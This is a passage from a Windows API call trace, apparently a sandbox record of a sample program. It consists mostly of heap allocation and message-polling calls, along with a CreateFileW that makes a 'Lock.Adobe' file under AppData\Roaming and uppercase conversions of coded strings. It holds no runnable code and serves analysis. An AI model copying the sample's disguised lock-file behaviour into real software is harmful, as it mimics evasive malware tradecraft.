lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0190.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0190.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.860] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0190.861] GetLastError () returned 0x5 [0190.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0190.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.adobe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0190.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0190.862] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.863] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.863] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.863] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.863] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.863] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.863] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0190.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.864] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0190.864] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.864] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0190.864] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.864] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.864] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.864] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.865] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.865] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.865] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.865] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.865] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.865] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.866] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.866] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.866] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.866] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.866] CharUpperBuffW (in: 